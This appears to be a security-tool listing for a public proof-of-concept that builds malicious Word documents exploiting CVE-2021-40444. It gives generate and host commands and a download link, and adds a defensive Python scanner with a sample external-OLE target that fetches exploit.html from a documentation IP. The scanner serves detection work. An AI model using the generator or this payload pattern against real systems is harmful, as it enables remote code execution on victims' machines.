Headline
CVE-2021-40444 PoC - Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)
<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-X7RGnp89UBU/YUNCQ39MNeI/AAAAAAAAunU/ZpAc4HUyWtMEl7jz_yxyLBLvvXkpbacLwCNcBGAsYHQ/s1473/CVE-2021-40444_3_calc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="820" data-original-width="1473" height="356" src="https://1.bp.blogspot.com/-X7RGnp89UBU/YUNCQ39MNeI/AAAAAAAAunU/ZpAc4HUyWtMEl7jz_yxyLBLvvXkpbacLwCNcBGAsYHQ/w640-h356/CVE-2021-40444_3_calc.png" width="640" /></a></div>
<p>Malicious docx <a href="https://www.kitploit.com/search/label/Generator" target="_blank" title="generator">generator</a> to exploit CVE-2021-40444 (Microsoft Office Word <a href="https://www.kitploit.com/search/label/Remote" target="_blank" title="Remote">Remote</a> Code Execution).</p>
<p>This script was written after some <a href="https://www.kitploit.com/search/label/Reverse%20Engineering" target="_blank" title="reverse engineering">reverse engineering</a> of the sample used in the wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file).</p>
<p>You need to install lcab first (<code>sudo apt-get install lcab</code>).</p>
<p>Check <code>REPRODUCE.md</code> for the manual reproduction steps.</p>
<p>If the generated cab does not work, try pointing the exploit.html URL at calc.cab instead.</p>
<br /><span style="font-size: large;"><b>Usage</b></span><br />
<p>First, generate a malicious docx from a DLL. You can use the one at <code>test/calc.dll</code>, which just pops <code>calc.exe</code> through a call to <code>system()</code>.</p>
<p><code>python3 exploit.py generate test/calc.dll http://&lt;SRV IP&gt;</code></p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-SdaSc2Sass4/YUNCYPNXwRI/AAAAAAAAunc/W83xraioxaEnxgZSQFj1eb2ZTdAcBiGOQCNcBGAsYHQ/s1007/CVE-2021-40444_1_gen.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="586" data-original-width="1007" height="372" src="https://1.bp.blogspot.com/-SdaSc2Sass4/YUNCYPNXwRI/AAAAAAAAunc/W83xraioxaEnxgZSQFj1eb2ZTdAcBiGOQCNcBGAsYHQ/w640-h372/CVE-2021-40444_1_gen.png" width="640" /></a></div>
<p>Once the malicious docx has been generated (it will be in <code>out/</code>), you can set up the server:</p>
<p><code>sudo python3 exploit.py host 80</code></p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-gTFup3vQ5eo/YUNCbV0QDBI/AAAAAAAAung/wvEOAQCmfakkFniNlJocSglFbVacX3S6QCNcBGAsYHQ/s866/CVE-2021-40444_2_srv.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="680" data-original-width="866" height="502" src="https://1.bp.blogspot.com/-gTFup3vQ5eo/YUNCbV0QDBI/AAAAAAAAung/wvEOAQCmfakkFniNlJocSglFbVacX3S6QCNcBGAsYHQ/w640-h502/CVE-2021-40444_2_srv.png" width="640" /></a></div>
<p>Finally, open the docx in a <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> virtual machine:</p>
<p><a href="https://1.bp.blogspot.com/-X7RGnp89UBU/YUNCQ39MNeI/AAAAAAAAunU/ZpAc4HUyWtMEl7jz_yxyLBLvvXkpbacLwCNcBGAsYHQ/s1473/CVE-2021-40444_3_calc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="820" data-original-width="1473" height="356" src="https://1.bp.blogspot.com/-X7RGnp89UBU/YUNCQ39MNeI/AAAAAAAAunU/ZpAc4HUyWtMEl7jz_yxyLBLvvXkpbacLwCNcBGAsYHQ/w640-h356/CVE-2021-40444_3_calc.png" width="640" /></a></p>
<br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/lockedbyte/CVE-2021-40444" rel="nofollow" target="_blank" title="Download CVE-2021-40444">Download CVE-2021-40444</a></span></b></div>
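<p>The detection side of the documents this tool produces, as an added example that is not part of the tool or the original post: a docx is a zip container whose <code>word/_rels/*.rels</code> parts declare each relationship, and a relationship marked <code>TargetMode="External"</code> on an OLE-object part means Word will fetch that object from outside the document. The scanner below walks every <code>.rels</code> part, reports external OLE-object targets, and rates an <code>mhtml:</code> target as high, since that scheme is the indicator Microsoft and vendor write-ups published for the in-the-wild CVE-2021-40444 sample. The relationship type URIs are the standard OOXML ones; the sample documents are constructed in memory with a documentation IP (203.0.113.10) so the check runs offline.</p>

```python
import io
import sys
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Standard OOXML package relationship namespace and the two relationship types compared below.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
HYPERLINK_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"


def scan_docx(docx_bytes: bytes) -> list[dict]:
    """Report every relationship in any .rels part that is marked TargetMode="External".
    External OLE-object relationships are rated 'high' when the target uses the mhtml:
    scheme and 'medium' otherwise; other external relationships (ordinary hyperlinks)
    are returned as 'info' so an analyst can still see them."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                target = rel.get("Target", "")
                rel_type = rel.get("Type", "")
                if rel_type == OLE_REL_TYPE:
                    severity = "high" if target.lower().startswith("mhtml:") else "medium"
                else:
                    severity = "info"
                findings.append({
                    "part": name,
                    "type": rel_type.rsplit("/", 1)[-1],  # short name, e.g. oleObject
                    "target": target,
                    "severity": severity,
                })
    return findings


def verdict(findings: list[dict]) -> str:
    """Collapse the findings to one label: any external OLE object makes the file suspicious."""
    return "suspicious" if any(f["severity"] in ("high", "medium") for f in findings) else "clean"


def build_sample_docx(relationships: list[tuple[str, str, str]]) -> bytes:
    """Constructed, minimal docx-like zip (not a real sample) whose document part
    declares the given (Id, Type, Target) triples, all with TargetMode="External"."""
    rels = ['<?xml version="1.0" encoding="UTF-8" standalone="yes"?>',
            f'<Relationships xmlns="{REL_NS}">']
    for rid, rtype, target in relationships:
        safe_target = escape(target, {'"': "&quot;"})
        rels.append(f'<Relationship Id="{rid}" Type="{rtype}" '
                    f'Target="{safe_target}" TargetMode="External"/>')
    rels.append("</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", "\n".join(rels))
    return buf.getvalue()


if __name__ == "__main__":
    # Scan real files given on the command line, or the two constructed samples when none are given.
    if len(sys.argv) > 1:
        inputs = [(p, open(p, "rb").read()) for p in sys.argv[1:]]
    else:
        inputs = [
            ("constructed-benign.docx", build_sample_docx([("rId1", HYPERLINK_REL_TYPE, "https://example.com/")])),
            ("constructed-external-ole.docx", build_sample_docx([("rId1", OLE_REL_TYPE, "mhtml:http://203.0.113.10/exploit.html")])),
        ]
    for label, data in inputs:
        found = scan_docx(data)
        print(f"{label}: {verdict(found)}")
        for f in found:
            print(f"  [{f['severity']}] {f['part']} {f['type']} -> {f['target']}")
```

<p>Run it with one or more <code>.docx</code> paths to triage a mailbox export or a quarantine folder; a document whose only external relationships are hyperlinks comes back <code>clean</code>, while any OLE-object relationship pointing off-document is surfaced for review regardless of scheme, so variants that swap the URL form are not missed.</p>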